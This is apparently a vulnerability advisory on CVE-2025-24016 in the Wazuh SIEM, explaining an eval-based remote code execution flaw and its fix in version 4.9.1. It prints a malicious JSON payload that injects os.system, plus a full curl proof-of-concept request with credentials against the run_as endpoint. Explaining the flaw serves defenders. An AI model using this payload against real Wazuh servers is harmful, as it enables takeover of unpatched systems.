Delivering Creative Technological Solutions
Delivering Creative Technological Solutions
Open-source Security Information and Event Management (SIEM) platform Wazuh suffers from CVE-2025-24016, which enables attackers to execute arbitrary code remotely on their servers.
Attackers who have API access can execute arbitrary Python commands on vulnerable servers through this vulnerability, which exists from version 4.4.0 up to 4.9.0. The as_wazuh_object function processes DistributedAPI (DAPI) request or response data that makes the vulnerability active. The vulnerability enables attackers to execute arbitrary Python code, resulting in system takeover, data breaches, and complete security damage to infrastructure.
The safe ast.literal_eval function change in version 4.9.1 enables vulnerability protection.
Open-source Security Information and Event Management (SIEM) platform Wazuh suffers from CVE-2025-24016 which enables attackers to execute arbitrary code remotely on their servers.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:Hframework/wazuh/core/cluster/common.pyThe security problem resides inside the as_wazuh_object function within framework/wazuh/core/cluster/common.py. DAPI data serialization occurs through this function to process JSON data used for communication between Wazuh API, manager, and agents.
Before the implementation of the security patch the vulnerable code section appeared as follows:
def as_wazuh_object(dct: Dict):
try:
if '__wazuh_datetime__' in dct:
return datetime.datetime.fromisoformat(dct['__wazuh_datetime__'])
elif '__unhandled_exc__' in dct:
exc_data = dct['__unhandled_exc__']
return eval(exc_data['__class__'])(*exc_data['__args__']) # π¨ VULNERABLE π¨
return dct
except (KeyError, AttributeError):
return dct
The code checks if the dictionary dct contains the key __unhandled_exc__. A valid dictionary value for __unhandled_exc__ enables the code to obtain class and args values before implementing eval to create an instance of __class__ with arguments __args__. Evaluating untrusted data means exposing the system to severe Python code execution since attackers control it.
CVE-2025-24016 occurs because eval operates on every data string received from the Distributed API for serialization. Evaluation functions in Python enable execution of arbitrary program code so this creates a major security threat to users.
The vulnerability can be abused by attackers who create specific malicious JSON data including the unhandled_exc dictionary entry. A specifically constructed dictionary within the Python class gets passed to the eval function allowing server-execution of arbitrary code.
The vulnerability appears because the as_wazuh_object function fails to properly clean or check incoming data before sending it to evaluation. Attackers can execute remote code by placing their own code into the class and args fields because this vulnerability allows control over these parameters.
An attacker can send the following JSON payload:
{
"__unhandled_exc__": {
"__class__": "os.system",
"__args__": ["touch /tmp/pwn.txt"]
}
}
The execution of eval within as_wazuh_object produces a system call of os.system("touch /tmp/pwn.txt"), leading to the creation of a file named /tmp/pwn.txt on the Wazuh server.
Exploiting this vulnerability requires API access, which attackers can obtain through compromised dashboards, agents, or weak credentials.
A proof-of-concept (PoC) demonstrates how exploitation can be carried out via the run_as endpoint:
curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" \
--data '{"__unhandled_exc__":{"__class__": "os.system", "__args__": ["touch /tmp/pwn.txt"]}}' \
https://<worker-server>:55000/security/user/authenticate/run_as
Explanation of the Exploit:
-X POST β Specifies the HTTP method as POST.-k β Disables SSL certificate verification (useful for testing in environments with self-signed certificates).-u "wazuh-wui:MyS3cr37P450r.*-" β Provides authentication credentials (default credentials are used here, which should be changed for security).-H "Content-Type: application/json" β Sets the Content-Type header to application/json to indicate the request body format.--data '{"__unhandled_exc__":{"__class__": "os.system", "__args__": ["touch /tmp/pwn.txt"]}}' β Injects the malicious JSON payload, which executes the command touch /tmp/pwn.txt on the Wazuh server, demonstrating arbitrary code execution.https://<worker-server>:55000/security/user/authenticate/run_as β Specifies the run_as endpoint URL. Replace <worker-server> with the actual hostname or IP address of the Wazuh worker server.A successful attack grants the following capabilities:
Wazuh resolved this vulnerability in version 4.9.1 by replacing eval with ast.literal_eval, which securely evaluates literals without allowing arbitrary code execution.
Here is the relevant code modification in framework/wazuh/core/cluster/common.py:
elif '__unhandled_exc__' in dct:
exc_data = dct['__unhandled_exc__']
- return eval(exc_data['__class__'])(*exc_data['__args__'])
+ exc_dict = {exc_data['__class__']: exc_data['__args__']}
+ return ast.literal_eval(json.dumps(exc_dict))
return dct
The patch mitigates the vulnerability by replacing the unsafe eval function with ast.literal_eval. Unlike eval, ast.literal_eval only processes Python literals, eliminating arbitrary code execution risks.
To reduce the risk associated with this vulnerability, organizations should implement the following security measures:
__unhandled_exc__.
Stay Vigilant, Stay Secure
Be the First one to comment!